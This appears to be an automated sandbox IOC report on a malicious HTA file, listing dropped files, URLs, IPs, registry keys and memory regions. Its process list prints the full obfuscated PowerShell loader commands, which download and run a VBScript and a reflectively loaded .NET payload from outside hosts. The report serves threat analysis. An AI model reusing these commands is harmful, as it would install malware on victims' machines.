IOC Report
na.hta

loading gif

Files

File Path
Type
Category
Malicious
na.hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\verybestthingswesharedfornew[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (366)
dropped
C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.out
Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\0rfajt3l\CSC378EC5CD3A3F432FA3C6C9642D503F33.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RES15CB.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Mon Oct 14 10:10:16 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awikqj3p.32t.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ia1s23iz.eys.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lczi1jlh.nav.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qs11iz2s.ntg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tnuasuvz.ula.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulas1yit.wkq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yosati0i.hkt.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zo3v0nrn.1ak.ps1
ASCII text, with no line terminators
dropped
There are 9 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\na.hta"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES15CB.tmp" "c:\Users\user\AppData\Local\Temp\0rfajt3l\CSC378EC5CD3A3F432FA3C6C9642D503F33.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://ia600102.us.archive.org
unknown
malicious
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot
unknown
malicious
http://192.3.220.40/330/verybestthingswesharedfornew.tIFn
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
https://ia600102.us.archive.org/32/itLR
unknown
http://192.3.220.40/330/verybestthingswesharedfornew.tIF
192.3.220.40
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
unknown
https://github.com/Pester/Pester
unknown
https://ia600102.2o
unknown
http://192.3.220.40/330/verybest
unknown
https://aka.ms/pscore6lB
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://192.3.220.40/330/verybestthingswesharedfornew.tIFn-
unknown
https://ia600102.us.archive.org/32/items/detah-note-v_202410/detahnot
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 15 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ia600102.us.archive.org
207.241.227.242
malicious
15.164.165.52.in-addr.arpa
unknown
50.23.12.20.in-addr.arpa
unknown

IPs

IP
Domain
Country
Malicious
207.241.227.242
ia600102.us.archive.org
United States
malicious
192.3.220.40
unknown
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5CB0000
heap
page read and write
3294000
heap
page read and write
2A30000
trusted library allocation
page execute and read and write
829E000
stack
page read and write
268E000
stack
page read and write
835B000
stack
page read and write
75D0000
trusted library allocation
page execute and read and write
8110000
trusted library allocation
page read and write
6244000
heap
page read and write
4C20000
direct allocation
page read and write
4BE0000
trusted library allocation
page read and write
2710000
heap
page read and write
6195000
heap
page read and write
561A000
trusted library allocation
page read and write
5D66000
heap
page read and write
49FE000
stack
page read and write
328B000
heap
page read and write
324D000
heap
page read and write
56CE000
heap
page read and write
57EB000
heap
page read and write
27BA000
heap
page read and write
643E000
stack
page read and write
5B9E000
stack
page read and write
2CD0000
trusted library allocation
page read and write
843E000
stack
page read and write
C80000
heap
page read and write
6211000
heap
page read and write
4E40000
trusted library allocation
page execute and read and write
5101000
trusted library allocation
page read and write
7800000
trusted library allocation
page read and write
53B6000
trusted library allocation
page read and write
32EE000
heap
page read and write
48A0000
heap
page read and write
50B5000
heap
page execute and read and write
4CF1000
trusted library allocation
page read and write
7300000
heap
page execute and read and write
2920000
trusted library allocation
page read and write
6104000
heap
page read and write
61AD000
heap
page read and write
5722000
heap
page read and write
5D7C000
heap
page read and write
4EEE000
stack
page read and write
727F000
stack
page read and write
4E50000
trusted library allocation
page read and write
5722000
heap
page read and write
4CD5000
heap
page read and write
422C000
stack
page read and write
70AE000
stack
page read and write
7660000
trusted library allocation
page read and write
2835000
heap
page read and write
5DB5000
trusted library allocation
page read and write
6218000
heap
page read and write
56FB000
heap
page read and write
28D4000
heap
page read and write
76D0000
heap
page read and write
5D1A000
heap
page read and write
A9F000
stack
page read and write
7262000
heap
page read and write
6203000
heap
page read and write
5D83000
heap
page read and write
6244000
heap
page read and write
740000
heap
page read and write
5D8F000
heap
page read and write
5719000
trusted library allocation
page read and write
753F000
stack
page read and write
2CB7000
trusted library allocation
page execute and read and write
51CE000
direct allocation
page read and write
5D80000
heap
page read and write
7F80000
trusted library allocation
page execute and read and write
6203000
heap
page read and write
285C000
heap
page read and write
2FF0000
heap
page read and write
62A3000
trusted library allocation
page read and write
5D83000
heap
page read and write
4D05000
heap
page read and write
8110000
heap
page read and write
753E000
stack
page read and write
2910000
trusted library allocation
page read and write
640000
heap
page read and write
6214000
heap
page read and write
2A10000
trusted library allocation
page read and write
728E000
heap
page read and write
717E000
stack
page read and write
27E000
stack
page read and write
4270000
trusted library allocation
page read and write
4AAE000
stack
page read and write
34FE000
stack
page read and write
5D8F000
heap
page read and write
77D0000
heap
page execute and read and write
4BDB000
trusted library allocation
page read and write
71B0000
trusted library allocation
page read and write
2A48000
heap
page read and write
691C000
stack
page read and write
61BB000
heap
page read and write
4FCD000
stack
page read and write
78BE000
stack
page read and write
5D86000
heap
page read and write
706E000
stack
page read and write
4995000
trusted library allocation
page execute and read and write
5D09000
heap
page read and write
6234000
heap
page read and write
7100000
trusted library allocation
page execute and read and write
61B9000
heap
page read and write
5C9E000
heap
page read and write
56AC000
heap
page read and write
3009000
heap
page read and write
559E000
stack
page read and write
6D8F000
stack
page read and write
2750000
heap
page read and write
5D09000
heap
page read and write
4990000
trusted library allocation
page read and write
294A000
trusted library allocation
page execute and read and write
4D06000
heap
page read and write
67AD000
stack
page read and write
6108000
heap
page read and write
7600000
trusted library allocation
page read and write
6244000
heap
page read and write
8450000
trusted library allocation
page read and write
27E0000
heap
page read and write
56A1000
heap
page read and write
6218000
heap
page read and write
6227000
heap
page read and write
5E57000
trusted library allocation
page read and write
5D45000
heap
page read and write
61A1000
heap
page read and write
32A4000
heap
page read and write
5722000
heap
page read and write
466F000
heap
page read and write
2939000
trusted library allocation
page read and write
6205000
heap
page read and write
23B0000
heap
page read and write
6218000
heap
page read and write
4E56000
trusted library allocation
page read and write
4B3E000
trusted library allocation
page read and write
4A6C000
stack
page read and write
5F0000
heap
page read and write
6244000
heap
page read and write
75F0000
trusted library allocation
page read and write
2D40000
heap
page readonly
23FD000
stack
page read and write
49B0000
trusted library allocation
page read and write
4C40000
direct allocation
page read and write
5A2E000
stack
page read and write
5DAA000
trusted library allocation
page read and write
4BA0000
direct allocation
page read and write
29FF000
stack
page read and write
6835000
heap
page execute and read and write
6F01000
heap
page read and write
7A50000
trusted library allocation
page read and write
37F0000
heap
page read and write
5260000
heap
page read and write
68BA000
stack
page read and write
6240000
heap
page read and write
56BA000
heap
page read and write
6B4E000
stack
page read and write
6ABF000
stack
page read and write
5D45000
heap
page read and write
620A000
heap
page read and write
6109000
trusted library allocation
page read and write
329D000
heap
page read and write
6830000
heap
page execute and read and write
775C000
heap
page read and write
619F000
heap
page read and write
6244000
heap
page read and write
6244000
heap
page read and write
2B70000
heap
page read and write
50B0000
heap
page execute and read and write
281C000
heap
page read and write
512F000
stack
page read and write
4F40000
heap
page read and write
7FD10000
trusted library allocation
page execute and read and write
873E000
stack
page read and write
32E2000
heap
page read and write
436E000
stack
page read and write
2823000
heap
page read and write
57F3000
heap
page read and write
31A0000
heap
page read and write
2970000
trusted library allocation
page read and write
571E000
heap
page read and write
5D51000
heap
page read and write
32C9000
heap
page read and write
329E000
heap
page read and write
4C15000
heap
page read and write
2A18000
trusted library allocation
page read and write
6211000
heap
page read and write
7610000
trusted library allocation
page read and write
4C10000
heap
page read and write
4C12000
trusted library allocation
page read and write
6A3B000
stack
page read and write
6211000
heap
page read and write
2822000
heap
page read and write
32E2000
heap
page read and write
7D60000
heap
page read and write
6070000
trusted library allocation
page read and write
2812000
heap
page read and write
2820000
heap
page read and write
56E2000
heap
page read and write
2E27000
heap
page read and write
61A1000
heap
page read and write
7202000
heap
page read and write
5D8F000
heap
page read and write
6244000
heap
page read and write
4DAE000
stack
page read and write
619F000
heap
page read and write
5B39000
trusted library allocation
page read and write
26F0000
trusted library allocation
page read and write
4F9E000
stack
page read and write
56F1000
heap
page read and write
5C97000
heap
page read and write
4EAF000
stack
page read and write
615C000
heap
page read and write
5703000
heap
page read and write
2C83000
trusted library allocation
page execute and read and write
619F000
heap
page read and write
871C000
stack
page read and write
5D82000
heap
page read and write
432E000
stack
page read and write
4D26000
heap
page read and write
2E30000
heap
page read and write
6218000
heap
page read and write
2D90000
heap
page read and write
2F26000
heap
page read and write
61E1000
heap
page read and write
61E1000
heap
page read and write
2872000
heap
page read and write
5D53000
heap
page read and write
2955000
trusted library allocation
page execute and read and write
5CA1000
heap
page read and write
7980000
trusted library allocation
page execute and read and write
7150000
trusted library allocation
page read and write
5CAD000
heap
page read and write
28CD000
heap
page read and write
3000000
heap
page read and write
28DC000
heap
page read and write
5D86000
heap
page read and write
2E09000
heap
page read and write
5D80000
heap
page read and write
3210000
heap
page read and write
725D000
heap
page read and write
616F000
heap
page read and write
5815000
heap
page read and write
6FEE000
stack
page read and write
61BC000
heap
page read and write
51C0000
direct allocation
page read and write
2B8C000
stack
page read and write
620A000
heap
page read and write
5D4F000
heap
page read and write
79C0000
trusted library allocation
page read and write
6102000
heap
page read and write
548F000
trusted library allocation
page read and write
7F62000
trusted library allocation
page read and write
5C99000
heap
page read and write
5D7C000
heap
page read and write
5D1A000
heap
page read and write
5D47000
heap
page read and write
6109000
heap
page read and write
6168000
heap
page read and write
61E1000
heap
page read and write
569F000
stack
page read and write
2D3E000
stack
page read and write
7C80000
heap
page read and write
5706000
heap
page read and write
328A000
heap
page read and write
5D53000
heap
page read and write
22FC000
stack
page read and write
2812000
heap
page read and write
860000
heap
page read and write
3160000
heap
page read and write
516E000
stack
page read and write
6197000
heap
page read and write
2780000
heap
page read and write
61A1000
heap
page read and write
69BB000
stack
page read and write
786D000
stack
page read and write
2DCE000
heap
page read and write
6237000
heap
page read and write
6224000
heap
page read and write
8520000
heap
page read and write
61D8000
heap
page read and write
56D9000
heap
page read and write
7190000
trusted library allocation
page read and write
37F7000
heap
page read and write
7351000
heap
page read and write
6F18000
heap
page read and write
620C000
heap
page read and write
56FE000
heap
page read and write
5CB2000
heap
page read and write
7CF0000
trusted library allocation
page read and write
5D51000
heap
page read and write
46F1000
trusted library allocation
page read and write
43A0000
heap
page read and write
4D26000
heap
page read and write
5E6B000
trusted library allocation
page read and write
71FE000
stack
page read and write
61B9000
heap
page read and write
32AE000
heap
page read and write
7754000
heap
page read and write
32CA000
heap
page read and write
7A53000
trusted library allocation
page read and write
6234000
heap
page read and write
71C0000
trusted library allocation
page read and write
7630000
trusted library allocation
page read and write
7CA7000
trusted library allocation
page read and write
7C3E000
stack
page read and write
303B000
heap
page read and write
5E50000
trusted library allocation
page read and write
57F3000
heap
page read and write
5817000
heap
page read and write
7294000
heap
page read and write
5DB1000
trusted library allocation
page read and write
5161000
trusted library allocation
page read and write
33FE000
stack
page read and write
5881000
trusted library allocation
page read and write
6165000
heap
page read and write
7736000
heap
page read and write
5B2E000
stack
page read and write
78FE000
stack
page read and write
5D80000
heap
page read and write
6CF0000
heap
page execute and read and write
61BC000
heap
page read and write
4DA0000
trusted library allocation
page read and write
4A40000
heap
page readonly
61A5000
heap
page read and write
51F0000
trusted library allocation
page read and write
619F000
heap
page read and write
61B7000
heap
page read and write
5C43000
heap
page read and write
620C000
heap
page read and write
723E000
stack
page read and write
615C000
heap
page read and write
7775000
heap
page read and write
329D000
heap
page read and write
5D83000
heap
page read and write
5D86000
heap
page read and write
76C0000
trusted library allocation
page read and write
6211000
heap
page read and write
61A1000
heap
page read and write
6161000
heap
page read and write
773E000
heap
page read and write
5D33000
heap
page read and write
313E000
stack
page read and write
5722000
heap
page read and write
4D38000
heap
page read and write
5D88000
heap
page read and write
6224000
heap
page read and write
2930000
trusted library allocation
page read and write
2950000
trusted library allocation
page read and write
5B6E000
stack
page read and write
5DA3000
trusted library allocation
page read and write
2D80000
trusted library allocation
page execute and read and write
5DAC000
trusted library allocation
page read and write
27EE000
heap
page read and write
3067000
heap
page read and write
2A00000
heap
page readonly
5715000
heap
page read and write
5B76000
trusted library allocation
page read and write
626D000
heap
page read and write
6F00000
heap
page read and write
622C000
heap
page read and write
6AD2000
heap
page read and write
4F8F000
stack
page read and write
6224000
heap
page read and write
7210000
heap
page read and write
5D66000
heap
page read and write
6CAE000
stack
page read and write
5756000
trusted library allocation
page read and write
32E2000
heap
page read and write
5D7C000
heap
page read and write
6E9A000
heap
page read and write
4D2D000
heap
page read and write
4847000
trusted library allocation
page read and write
5366000
trusted library allocation
page read and write
28D8000
heap
page read and write
727F000
heap
page read and write
7285000
heap
page read and write
230000
heap
page read and write
2820000
heap
page read and write
2D7A000
heap
page read and write
4CD0000
heap
page read and write
280000
heap
page read and write
5F4B000
stack
page read and write
56C9000
heap
page read and write
3B0000
heap
page read and write
321F000
heap
page read and write
6168000
heap
page read and write
7BC0000
trusted library allocation
page read and write
6244000
heap
page read and write
8090000
trusted library allocation
page execute and read and write
28A0000
heap
page read and write
3289000
heap
page read and write
7F480000
trusted library allocation
page execute and read and write
4660000
heap
page read and write
5722000
heap
page read and write
570E000
heap
page read and write
7BD0000
trusted library allocation
page read and write
31F0000
heap
page read and write
5C18000
heap
page read and write
56BC000
heap
page read and write
5D7C000
heap
page read and write
37F6000
heap
page read and write
31F8000
heap
page read and write
4EEB000
stack
page read and write
2F30000
heap
page read and write
32C3000
heap
page read and write
28D4000
heap
page read and write
6D42000
heap
page read and write
5D8F000
heap
page read and write
6173000
heap
page read and write
6E5B000
heap
page read and write
5D09000
heap
page read and write
2338000
stack
page read and write
622F000
heap
page read and write
8180000
trusted library allocation
page read and write
4AB6000
trusted library allocation
page read and write
5722000
heap
page read and write
6228000
heap
page read and write
28DC000
heap
page read and write
80A0000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
4D01000
heap
